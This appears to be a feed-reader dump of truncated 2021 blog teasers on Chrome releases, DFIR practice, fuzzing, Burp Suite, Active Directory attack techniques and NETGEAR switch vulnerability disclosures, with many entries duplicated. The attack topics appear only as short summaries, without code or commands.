    Chrome has long-term investments in performance improvement across many projects and we are pleased to share improvements across speed, memory, and unexpected hangs in today’s The Fast and the Curious series post. One in six searches is now as fast as a blink of an eye, Chrome OS browsing now uses up to 20% less memory thanks to our PartitionAlloc investment, and we’ve resolved some thorny Chrome OS and Windows shutdown experiences. Omnibox You’ve probably noticed that potential queries are suggested to you as you type when you’re searching the web using Chrome’s omnibox (as long as the “Autocomplete searches and URLs” feature is turned on in Chrome settings.) This makes searching for information faster and easier, as you don’t have to type in the entire search query -- once you’ve entered…
  • Open

    Tips for DFIR Analysts, pt IV
    Context is king, it makes all the difference. You may see something run in EDR telemetry, or in logs, but the context of when it ran in relation to other activities is often critical. Did it occur immediately following a system reboot or a user login? Does it occur repeatedly? Does it occur on other systems? Did it occur in rapid succession with other commands, indicating that perhaps it was scripted? The how and when of the context then leads to attribution. Andy Piazza brings the same thoughts to CTI in his article, "CTI is Better Served with Context". Automation can be a wonderful thing, if you use it, and use it to your advantage. The bad guys do it all the time. Automation means you don't have to remember steps (because you will forget), and it drives consistency and efficiency. Even …  ( 6 min )

  • Open

    Improvements to Burp Suite authenticated scanning
    Burp Suite's authenticated scanning feature enables users to scan privileged areas of target web applications even when a complex login sequence is required. This leverages Burp's browser - using the  ( 4 min )
  • Open

    Improvements to Burp Suite authenticated scanning
    Burp Suite's authenticated scanning feature enables users to scan privileged areas of target web applications even when a complex login sequence is required. This leverages Burp's browser - using the  ( 4 min )

  • Open

    Autofuzz – Fuzzing Java Without Writing Fuzz Targets
    Article URL: https://fuzz.ci/jazzer/update/2.0 Comments URL: https://news.ycombinator.com/item?id=29013958 Points: 3 # Comments: 1  ( 2 min )

  • Open

    DevSecOps Scanning Challenges & Tips
    There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […] The post DevSecOps Scanning Challenges & Tips appeared first on Security Weekly.  ( 2 min )

  • Open

    An Intro to Fuzzing (a.k.a. Fuzz Testing)
    Article URL: https://labs.bishopfox.com/tech-blog/an-intro-to-fuzzing-aka-fuzz-testing Comments URL: https://news.ycombinator.com/item?id=28988478 Points: 4 # Comments: 0  ( 14 min )

  • Open

    Security Fuzzing Podcast Episode
    Article URL: https://anchor.fm/firo-solutions/episodes/Fuzzing-with-Patrick-Ventuzelo-e197t6c Comments URL: https://news.ycombinator.com/item?id=28977322 Points: 4 # Comments: 0  ( 23 min )

  • Open

    Chrome 96 Beta: Conditional Focus, Priority Hints, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 96 is beta as of October 21, 2021. Preparing for a Three Digit Version Number Next year, Chrome will release version 100. This will add a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduces a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 is available from Chrome 96 onward. Origin Trials This version of Chrome introduces the origin trials described below. Origin…
    Sunsetting the "basic-card" payment method in the Payment Request API
    The Payment Request API is a soon-to-be-recommended web standard that aims to make building low-friction and secure payment flows easier for developers. The browser facilitates the flow between a merchant website and "payment handlers". A payment handler can be built-in to the browser, a native app installed on user’s mobile device, or a Progressive Web App. Today, developers can use the Payment Request API to access several payment methods, including “basic-card” and Google Pay in Chrome on most platforms, Apple Pay in Safari, Digital Goods API on Google Play, and Secure Payment Confirmation in Chrome. Earlier last year, we announced that we will deprecate the "basic-card" payment handler on iOS Chrome, followed by other platforms in the future. The "basic-card" is a payment method that is typically built into the browser to help users easily enter credit card numbers without remembering and typing them. This was designed to make a good transition from a form based credit card payment to an app based tokenized card payment. In order to better pursue the goal of app based payment (and a few other reasons), the Web Payments WG decided to remove it from the specification. Starting from version 96, Chrome will show a warning message in DevTools Console (together with creating a report to Reporting API) when the "basic-card" payment method is used. In version 100, the "basic-card" payment method will be no longer available and canMakePayment() will return false unless other capable payment methods are specified. This applies to all platforms including Android, macOS, Windows, Linux, and Chrome OS. If you are using the Payment Request API with the "basic-card" payment handler, we suggest removing it as soon as possible and using an alternative payment method such as Google Pay or Samsung Pay. Posted by Eiji Kitamura, Developer Advocate on the Chrome team
  • Open

    Get Burp Suite certified for free...
    Ready for the challenge? Buy your certification exam now... Burp Suite Certified Practitioner accreditation to enable our users to validate their self-taught skills as web security prac  ( 3 min )
  • Open

    Get Burp Suite certified for free...
    Ready for the challenge? Buy your certification exam now... Burp Suite Certified Practitioner accreditation to enable our users to validate their self-taught skills as web security prac  ( 3 min )
  • Open

    [译] NAT 穿透是如何工作的:技术原理及企业级实践(Tailscale, 2020)
    译者序 本文翻译自 2020 年的一篇英文博客: How NAT traversal works。 设想这样一个问题:在北京和上海各有一台局域网的机器(例如一台是家里的台式机,一 台是连接到星巴克 WiFi 的笔记本),二者都是私网 IP 地址,但可以访问公网, 如何让这两台机器通信呢? 既然二者都能访问公网,那最简单的方式当然是在公网上架设一个中继服务器: 两台机器分别连接到中继服务,后者完成双向转发。这种方式显然有很大的性能开销,而 且中继服务器很容易成为瓶颈。 有没有办法不用中继,让两台机器直接通信呢? 如果有一定的网络和协议基础,就会明白这事儿是可能的。Tailscale 的这篇史诗级长文由浅入深地展示了这种“可能”,如果完全实现本文所 介绍的技术,你将得到一个企业级的 NAT/防火墙穿透工具。 此外,如作者所说,去中心化软件领域中的许多有趣想法,简化之后其实都变成了 跨过公网(互联网)实现端到端直连 这一问题,因此本文的意义并不仅限于 NAT 穿透本身。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 引言 1.1 背景:IPv4 地址短缺,引入 NAT 1.2 需求:两台经过 NAT 的机器建立点对点连接 1.3 方案:NAT 穿透 1.3.1 两个必备前提:UDP + 能直接控制 socket 1.3.2 保底方式:中继 1.4 挑战:有状态防火墙和 NAT 设备 2 穿透防火墙 2.1 有状态防火墙 2.1.1 默认行为(策略) 2.1.2 如何区分入向和出向包 2.2 防火墙朝向(face-off)与穿透方案 2.2.1 防火墙朝向相同 场景特点:服务端 IP 可直接访问 穿透方案:客户端直连服务端,或 hub-and-s…

  • Open

    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )
    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )
  • Open

    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )
    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )

  • Open

    Fuzzing-101: learn how to fuzz like a real expert
    Article URL: https://github.com/antonio-morales/Fuzzing101 Comments URL: https://news.ycombinator.com/item?id=28923466 Points: 4 # Comments: 0  ( 3 min )
    The Challenges of Fuzzing 5G Protocols
    Article URL: https://research.nccgroup.com/2021/10/11/the-challenges-of-fuzzing-5g-protocols/ Comments URL: https://news.ycombinator.com/item?id=28917943 Points: 5 # Comments: 0  ( 11 min )
    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://github.com/google/fuzzing/blob/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28916409 Points: 1 # Comments: 0  ( 1 min )
    Autofuzz – Java fuzzing without writing fuzz targets
    Article URL: https://blog.code-intelligence.com/autofuzz Comments URL: https://news.ycombinator.com/item?id=28915778 Points: 3 # Comments: 1  ( 2 min )
  • Open

    It Should Be ‘Cybersecurity Culture Month’
    It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture.That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly.“If your security awareness program […] The post It Should Be ‘Cybersecurity Culture Month’ appeared first on Security Weekly.  ( 2 min )

  • Open

    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://raw.githubusercontent.com/google/fuzzing/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28909004 Points: 11 # Comments: 0  ( 41 min )
  • Open

    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )
    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )
  • Open

    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )
    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )

  • Open

    Extending Chrome App Support on Chrome OS
    Posted by Paul Rossman, Technical Program Manager, Chrome Today we're announcing an important update to the previously communicated Chrome app support timeline. Based on feedback from our Enterprise and Education customers and partners, we have made the decision to extend Chrome app support for those users on Chrome OS until at least January 2025.  We continue to invest and have made significant progress in rich new capabilities on the Web platform with Progressive Web Apps (PWA), and we recommend that Chrome app developers migrate to PWAs as soon as possible. PWAs are built and enhanced with modern APIs to deliver enhanced capabilities, reliability, and installability while reaching anyone, anywhere, on any device with a single codebase. There is a growing ecosystem of powerful desktop web apps & PWAs, from advanced graphics products like Adobe Spark to engaging media apps like YouTube TV to productivity and collaboration apps like Zoom. For additional support with Chrome app migration, please visit our Web apps on Chrome OS page. This page will be kept up to date as we progress together through this process. We thank our community of developers who have provided feedback to help us shape this modified and simplified approach. We are inspired by a future beyond Chrome apps, where the ecosystem continues forward progress leveraging open Web standards across all modern browsers.

  • Open

    The Power of Developer-First Security
    Developers want to write good code. Secure code. Tools that optimize developer workflows for handling security issues can take a large burden off security practitioners and make triaging, understanding, prioritizing, and resolving vulnerabilities much easier and faster for the developer. That’s what DevSecOps is all about. One company that has developed such tools is GitLab. […] The post The Power of Developer-First Security appeared first on Security Weekly.  ( 2 min )

  • Open

    Data Exfiltration, Revisited
    I've posted on the topic of data exfiltration before (here, etc.) but often it's a good idea to revisit the topic. After all, it was almost two years ago that we saw the first instance of ransomware threat actors stating publicly that they'd exfiltrated data from systems, using this a secondary means of extortion. Since then, we've continued to see this tactic used, along with other tertiary means of extortion based on data exfiltration. We've also seen several instances where the threat actor ransom notes have stated that data was exfiltrated but the public "shaming" sites were noticeably empty. As long as I've been involved in what was first referred to as "information security" (later referred to as "cyber security"), data exfiltration has been a concern to one degree or another, even i…  ( 5 min )

  • Open

    Show HN: Prebuilt gotip releases for quickly trying out Go 1.18 fuzzing/generics
    Article URL: https://github.com/clean8s/gotip-built Comments URL: https://news.ycombinator.com/item?id=28810470 Points: 4 # Comments: 0  ( 2 min )

  • Open

    Tips for DFIR Analysts, pt III
    Learn to think critically. Don't take what someone says as gospel, just because they say it. Support findings with data, and clearly communicate the value or significance of something. Be sure to validate your findings, and never rest your findings on a single artifact. Find an entry for a file in the AmCache? Great. But does that mean it was executed on the system? No, it does not...you need to validate execution with other artifacts in the constellation (EDR telemetry, host-based effects such as an application prefetch file, Registry modifications, etc.). Have a thorough process, one that you can add to and extend. Why? Because things are always changing, and there's always something new. If you can automate your process, then so much the better...you're not loosing time and enabling…  ( 7 min )
    EDR Bypasses
    During my time in the industry, I've been blessed to have opportunities to engage with a number of different EDR tools/frameworks at different levels. Mike Tanji offered me a look at Carbon Black before carbonblack.com existed, while it still used an on-prem database. I spent a very good deal of time working directly with Secureworks Red Cloak, and I've seen CrowdStrike Falcon and Digital Guardian's framework up close. I've seen the birth and growth of Sysmon, as well as MS's "internal" Process Tracking (which requires an additional Registry modification to record full command lines). I've also seen Nuix Adaptive Security up close (including seeing it used specifically for threat hunting), which rounds out my exposure. So, I haven't seen all tools by any stretch of the imagination, but mor…  ( 6 min )

  • Open

    [译] 写给工程师:关于证书(certificate)和公钥基础设施(PKI)的一切(SmallStep, 2018)
    译者序 本文翻译自 2018 年的一篇英文博客: Everything you should know about certificates and PKI but are too afraid to ask, 作者 MIKE MALONE。 这篇长文并不是枯燥、零碎地介绍 PKI、X.509、OID 等概念,而是从前因后果、历史沿革 的角度把这些东西串联起来,逻辑非常清晰,让读者知其然,更知其所以然。 证书和 PKI 的目标其实很简单:将名字关联到公钥(bind names to public keys)。 加密方式的演进: MAC 最早的验证消息是否被篡改的方式,发送消息时附带一段验证码 | 双方共享同一密码,做哈希;最常用的哈希算法:HMAC | \/ Signature 解决 MAC 存在的一些问题;双方不再共享同一密码,而是使用密钥对 | | \/ PKC 公钥加密,或称非对称加密,最常用的一种 Signature 方式 | 公钥给别人,私钥自己留着; | 发送给我的消息:别人用 *我的公钥* 加密;我用我的私钥解密 \/ Certificate 公钥加密的基础,概念:CA/issuer/subject/relying-party/... | 按功能来说,分为两种 | |---用于 *签名*(签发其他证书) 的证书 |---用于 *加解密* 的证书 证书(certificate)相关格式及其关系(沉重的历史负担): 最常用的格式 | 信息比 X.509 更丰富的格式 | 其他格式 mTLS 等常用 Java 常…

  • Open

    RenderingNG: an architecture that makes and keeps Chrome fast for the long term
    Our continual investments in the performance of Chrome have led to significant improvements in battery life, memory, and the speed of the web. This post in The Fast & the Curious series highlights the rendering journey of Chrome over the past eight years, a journey that has led to a browser that is better across the board. For example, Chrome 94, as compared with Chrome 93: is up to 8% more responsive on real pages, saves more than 1400 years of CPU time per day, and improves battery life by up to 0.5% In addition, recent versions of Chrome are much better than those of years past with: 150% or more faster graphics rendering, and greater reliability, due to a 6x reduction in GPU driver crashes on problematic hardware Introduction RenderingNG is a long-term project to systematically imp…

  • Open

    Fuzzing with Postman
    For the ones who have never heard about fuzzing, here goes the short explanation: Continue reading on Medium »  ( 4 min )
  • Open

    Fuzzing with Postman
    For the ones who have never heard about fuzzing, here goes the short explanation: Continue reading on Medium »  ( 4 min )

  • Open

    JavaScript Test Case Generator Based on Branch Coverage and Fuzzing
    Article URL: https://slashdot.org/submission/14707493/javascript-test-case-generator-based-on-branch-coverage-and-fuzzing Comments URL: https://news.ycombinator.com/item?id=28745108 Points: 1 # Comments: 1  ( 3 min )

  • Open

    /r/netsec's Q4 2021 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 26 min )

  • Open

    Google's Beginner Quest 2021 - all tasks solved recording
    Google CTF nowadays is a pretty large event - or should I say 3 connected events, with the pretty hardcore main CTF being one of them, and Hackceler8 - where speedrunning meets CTFs and game hacking - being the second. The last one, but probably the most popular one is Beginners Quest - a set of CTF challenges tied together with a story (a 001337 spy story in this specific case) and aimed at folks who like challenges, but prefer to take it easy is a stress free (i.e. no scoreboard) environment. Anyway, yesterday I've made an over 4 hour long livestream where I've solved all the challenges from this year's BQ, and here's the recording - enjoy! Timeline (in order of solving): 15:46 - Task 1: CCTV (rev) 23:38 - Task 2: Logic Lock (misc) 34:27 - Task 3: High Speed Chase (misc) 49:25 - Task 5: Twisted robot (misc) 1:07:50 - Task 8: Hide and seek (misc) 1:22:10 - Task 10: Spycam (hw) 1:47:15 - Task 12: Old lock (web) 1:55:47 - Task 13: Noise on the wire (net) 2:04:45 - Task 15: Just another keypad (rev) 2:14:48 - Task 17: Playing golf (misc) 3:01:08 - Task 18: Strange Virtual Machine (rev) 3:41:49 - Task 4: Electronics Research Lab (hw) 3:51:41 - Task 6: To the moon (misc) 4:16:40 - Task 7: ReadySetAction (crypto) 4:25:30 - Task 9: Konski-Hiakawa Law of Droids (rev) 4:28:23 - Task 11: pwn-notebook (pwn) 4:41:59 - Task 14: web-quotedb (web) 4:45:04 - Task 16: Hash-meee (misc)

  • Open

    Helping users explore the web and continue prior tasks
    When you’re looking for a certain piece of information or working on a project, your path through the internet likely isn’t a linear one. You might search for the same thing multiple times, jump between pages, head back to Google Search again, or parse through your history for that one page you can’t seem to find again. It can be challenging, and more importantly, it can take up time that you could be using to get things done. Now, we’re kicking off two new experiments with the goal of making it easier to navigate, explore and keep track of the things you find on the web. Continue your explorations of the web If you’ve already started exploring a topic and visited multiple sites along the way over a number of days or weeks, chances are you’ve found helpful information you might want to …

  • Open

    Burp Suite Professional: feature roundup
    The modern web is an increasingly complex beast. Each passing year brings with it new frameworks, technologies, and design trends - not to mention vulnerabilities. All of this adds to your testing wor  ( 6 min )
  • Open

    Burp Suite Professional: feature roundup
    The modern web is an increasingly complex beast. Each passing year brings with it new frameworks, technologies, and design trends - not to mention vulnerabilities. All of this adds to your testing wor  ( 6 min )

  • Open

    Training XSS Muscles
    XSS is all about practice. It requires a lot of time to print in the mind all vectors, payloads and tricks at our disposal. There are lots of XSS cases, each one requiring a different approach and construct to pop the alert box. Thinking on that and following the previous XSS Test Page released with … Continue reading Training XSS Muscles The post Training XSS Muscles appeared first on Brute XSS.
  • Open

    FUZZING: Automating Bug Detection
    Sometimes hacking isn’t about taking a program apart: It’s about throwing random objects at it to see what breaks. Continue reading on OWASP VITCC »  ( 4 min )
  • Open

    FUZZING: Automating Bug Detection
    Sometimes hacking isn’t about taking a program apart: It’s about throwing random objects at it to see what breaks. Continue reading on OWASP VITCC »  ( 4 min )

  • Open

    Imposter Syndrome
    Imposter Syndrome.  This is something many of us have experienced to one degree or another, at various times. Many have experienced, some have overcome it, others may not be able to and wonder why. HealthLine tells us, "Imposter feelings represent a conflict between your own self-perception and the way others perceive you." I would modify that slight to, "...the way we believe others perceive us." Imposter syndrome is something internalized, and has very little to do with the outside world. I wanted to take the opportunity to share with you, the reader, what I've learned over the years about what's really happening in the world when we're having those feelings of imposter syndrome. Perception: I don't want to present at a conference, or ask a question at a conference, because everyone know…  ( 6 min )

  • Open

    Chrome 95 Beta: Secure Payment Confirmation, WebAssembly Exception Handling and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 95 is beta as of September 23, 2021. Origin Trials This version of Chrome introduces the origin trials described below. Origin trials allow you to try new features and give feedback on usability, practicality, and effectiveness to the web standards community. To register for any of the origin trials currently supported in Chrome, including the ones described below, visit the Chrome Origin Trials dashboard. To learn more about origin trials in Chrome, visit the Origin Trials Guide for Web Developers. Microsoft Edge runs its own origi…

  • Open

    Dev.fuzz (fuzzing) merged in Golang tip
    Article URL: https://github.com/golang/go/commit/6e81f78c0f1653ea140e6c8d008700ddad1fa0a5 Comments URL: https://news.ycombinator.com/item?id=28604475 Points: 2 # Comments: 0  ( 7 min )
    Native fuzzing will be in Go 1.18
    Article URL: https://twitter.com/katie_hockman/status/1440082486692773897 Comments URL: https://news.ycombinator.com/item?id=28602233 Points: 1 # Comments: 0  ( 1 min )

  • Open

    Building a More Secure AppDev Process
    Enterprises that integrate security testing into their CI/CD pipeline fix 91.4 percent of new issues, according to a progress report from ShiftLeft. Recent software supply chain attacks illustrate the growing risks businesses, their partners, and customers face. But a recent report suggests better outcomes for those who put security at the heart of app development. Data from […] The post Building a More Secure AppDev Process appeared first on Security Weekly.  ( 2 min )
  • Open

    Software Fuzzing: What, Why, What next?
    Software development is a manual process and, more often than not, is the work of one or more developers with varied expertise and… Continue reading on Medium »  ( 5 min )
  • Open

    Software Fuzzing: What, Why, What next?
    Software development is a manual process and, more often than not, is the work of one or more developers with varied expertise and… Continue reading on Medium »  ( 5 min )

  • Open

    Distros and RegRipper
    Over the years, every now and then I've taken a look around to try to see where RegRipper is used. I noticed early on that it's included in several security-oriented Linux distros. So, I took the opportunity to compile some of the links I'd found, and I then extended those a bit with some Googling. I will admit, I was a little surprised to see how, over time, how far RegRipper has gone, from a "here, look at this" perspective. Not all of the below links are current, some are several years old. As such, they are not the latest and greatest; however, they may still apply and they may still be useful/valuable. RegRipper on Linux (Distros)  Kali, Kali GitLab  SANS SIFT  CAINE   Installing RegRipper on Linux  Install RRv2.8 on Ubuntu  CentOS RegRipper package  Arch Linux   RegRipper Docker Imag…  ( 5 min )
    On Writing DFIR Books, pt II
    Part I of this series kicked things off for us, and honestly I have no idea how long this series will be...I'm just writing the posts without a specific plan or outline for the series. In this case, I opted to take an organic approach, and wanted to see where it would go. Content Okay, so you have an idea for a book, but about...what? You may have a title or general idea, but what's the actual content you intend to write about? Is it more than a couple of paragraphs; can you actually create several solid chapters without having to use a lot of filler and fluff? Back when I was actively writing books, this was something on the forefront of my mind, not only because I was writing books, but later I got a question or two from others along these lines. In short, I write about stuff I know, or …  ( 5 min )

  • Open

    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )
    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )
  • Open

    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )
    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )
  • Open

    User-Agent Reduction Origin Trial and Dates
    Back in May, we published an update on our User-Agent string reduction plans with a promise to publish further details on timing. Now that we have an origin trial ready for testing the Reduced User-Agent header (and associated JS interfaces) we have estimated timelines to share. What follows is repeated from the original blog post, but contains estimated Chrome versions where these Phases will begin to help you prepare.  The Chromium schedule dashboard will be useful for understanding dates associated with each Chrome version and its progression from Canary into Beta and Stable Release. Note: The usual disclaimers about estimating engineering deadlines apply—unforeseen circumstances may dictate delays. But in the case that we encounter delays, we do not intend to accelerate timelines bet…
  • Open

    [译] 基于角色的访问控制(RBAC):演进历史、设计理念及简洁实现(Tailscale, 2021)
    译者序 本文翻译自 2021 年的一篇英文博客: RBAC like it was meant to be。 很多系统(例如 Kubernetes、AWS)都在使用某种形式的 RBAC 做权限/访问控制。 本文基于 access control 的发展历史,从设计层面分析了 DAC -> MAC -> RBAC -> ABAC的演进历程及各模型的优缺点、适用场景等, 然后从实际需求出发,一步步地设计出一个实用、简洁、真正符合 RBAC 理念的访问控制系统。 作为对比,如果想看看表达能力更强(但也更复杂)的 RBAC/ABAC 系统是什么样子,可以研究一下 AWS 的访问控制模型。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 从 DAC 到 MAC 1.1 DAC(自主访问控制):各文件 owner 自主设置文件权限 设计 使用场景:普通用户的文件权限控制 1.2 MAC(强制访问控制):(强制由)专门的 admin 设置文件权限 设计:DAC 基础上引入专门的 admin 角色 例子:TCP/UDP 端口号 适用场景:文档/系统访问控制 1.3 MAC 之双因素登录(two-factor login as MAC) 1.4 图片分享:DAC/MAC 模型比较 1.5 MAC 概念:限制太多,又好像没什么限制 2 第一次尝试:基于 RBAC/ABAC 2.1 RBAC(基于角色的访问控制) 2.2 ABAC(基于属性的访问控制) 2.3 也许你从未用过真正的 RBAC Windows 文件安全模型:每个文件一个 ACL 控制谁能访问哪个文件 2.4 存在的问题:ACL 太多,到处重复,批量修改麻烦 3 第二次尝试:每个 ACL 对应一个用户组 3.1 仍…

  • Open

    Account Persistence – Certificates
    It is not uncommon organizations to implement an internal certification authority in order to establish trust between entities (users, computers etc.) or utilize it for… Continue reading → Account Persistence – Certificates  ( 7 min )
  • Open

    Account Persistence – Certificates
    It is not uncommon organizations to implement an internal certification authority in order to establish trust between entities (users, computers etc.) or utilize it for… Continue reading → Account Persistence – Certificates  ( 7 min )
  • Open

    Seventh Inferno vulnerability (some NETGEAR smart switches)
    <img src="https://gynvael.coldwind.pl/img/seventh-inferno-small.jpg" alt="Name of the vulnerability - Seventh Inferno - in a flaming font on dark rocky background" class="banner-fill"> TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. P.S. This vulnerability and exploit chain is actually quite interesting technically. In short, it goes from a newline injection in the password field, through being able to write a file with constant uncontrolled content of 2 (like, one byte 32h), through a DoS and session crafting (which yields an admin web UI user), to an eventual post-auth shell injection (which yields full root). …

  • Open

    Tips for DFIR Analysts, pt II
    On the heels of my first post with this subject, I thought I'd continue adding tips as they came to mind... I've been engaged with EDR frameworks for some time now. I first became aware of Carbon Black before it was "version 1.0", and before "carbonblack.com" existed. Since then, I've worked for several organizations that developed EDR frameworks (Secureworks, Nuix, CrowdStrike, Digital Guardian), and others that made use of frameworks created by others. I've also been very happy to see the development and growth of Sysmon, and used it in my own testing. One thing I've been acutely aware of is the visibility afforded by EDR frameworks, as well as the extent of that visibility. This is not a knock against these tools...not at all. EDR frameworks and tools are incredibly powerful, but they a…  ( 5 min )
    On Writing DFIR Books, pt I
    During my time in the industry, I've authored 9 books under three imprints, and co-authored a tenth. There, I said it. The first step in addressing a problem is admitting you have one. ;-) Seriously, though, this is simply to say that I have some experience, nothing more. During the latter part of my book writing experience, I saw others who wanted to do the same thing, but ran into a variety of roadblocks, roadblocks I'd long since navigated. As a result, I tried to work with the publisher to create a non-paid liaison role that would help new authors overcome many of those issues, so that a greater portfolio of quality books became available to the industry. By the time I convinced one editor of the viability and benefit of such a program, they had decided to leave their profession, and I…  ( 7 min )
  • Open

    Draconian Fear vulnerability (some NETGEAR smart switches)
    <img src="https://gynvael.coldwind.pl/img/draconian-fear-small.jpg" alt="Name of the vulnerability - Draconian Fear - in a red horror-style font on stained black background" class="banner-fill"> TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. Note: Details on Seventh Inferno will be publish on or after 13th September. Affected devices: GC108P GC108PP GS108Tv3 GS110TPP GS110TPv3 GS110TUP GS308T GS310TP GS710TUP GS716TP GS716TPP GS724TPP GS724TPv2 GS728TPPv2 GS728TPv2 GS750E GS752TPP GS752TPv2 MS510TXM MS510TXUP …
    Demon's Cries vulnerability (some NETGEAR smart switches)
    <img src="https://gynvael.coldwind.pl/img/demons-cries-small.jpg" alt="Name of the vulnerability - Demon's Cries - in a white horror-style font on stained bluish gray background" class="banner-fill"> TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. Note: Details on Seventh Inferno will be publish on or after 13th September. Affected devices: GC108P GC108PP GS108Tv3 GS110TPP GS110TPv3 GS110TUP GS308T GS310TP GS710TUP GS716TP GS716TPP GS724TPP GS724TPv2 GS728TPPv2 GS728TPv2 GS750E GS752TPP GS752TPv2 MS510TXM MS510…

  • Open

    Kiterunner API Fuzzer (Windows Installation)
    Hello Friends, This post to tell you about an API scanner called Kiterunner, I heard about it through Ms. Alissa Knight’s white paper “Go… Continue reading on Medium »
  • Open

    Kiterunner API Fuzzer (Windows Installation)
    Hello Friends, This post to tell you about an API scanner called Kiterunner, I heard about it through Ms. Alissa Knight’s white paper “Go… Continue reading on Medium »

  • Open

    OSInt, Doxing And Cyberstalking Page Updated
    Link: http://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking I added (https://usersearch.org) to the site. I also moved dead links to the bottom of the page. If you know sites/tools I should add, please contact me. The site has gotten a bit dated I think.

  • Open

    Web App and API Security Needs to Be Modernized: Here’s How
    Applications are critical for doing business. They are also the weakest links in many an organization’s security chain. Many APIs continue to expose the personally identifiable information of customers, employees and contractors. As OWASP (Open Web Application Security Project) notes on its API Security Project homepage: “By nature, APIs expose application logic and sensitive data […] The post Web App and API Security Needs to Be Modernized: Here’s How appeared first on Security Weekly.  ( 2 min )

  • Open

    Building a Career in CyberSecurity
    There's been a lot of discussion on social media around how to "break into" the cybersecurity field, not only for folks just starting out but also for those looking for a career change. This is not unusual, given what we've seen in the public news media around cyber attacks and ransomware; the idea is that cybersecurity is an exploding career field that is completely "green fields", with an incredible amount of opportunity. Jax Scott recently shared a YouTube video (be sure to comment and subscribe!) where she provides five steps to level up any career, based on her "must read for anyone seeking a career in cybersecurity" blog post. Jax makes a lot of great points, and rather than running through each one and giving my perspective, I thought I'd elaborate a bit on one in particular. Jax's …  ( 4 min )

  • Open

    Chrome 94 Beta: WebCodecs, WebGPU, Scheduling, and More
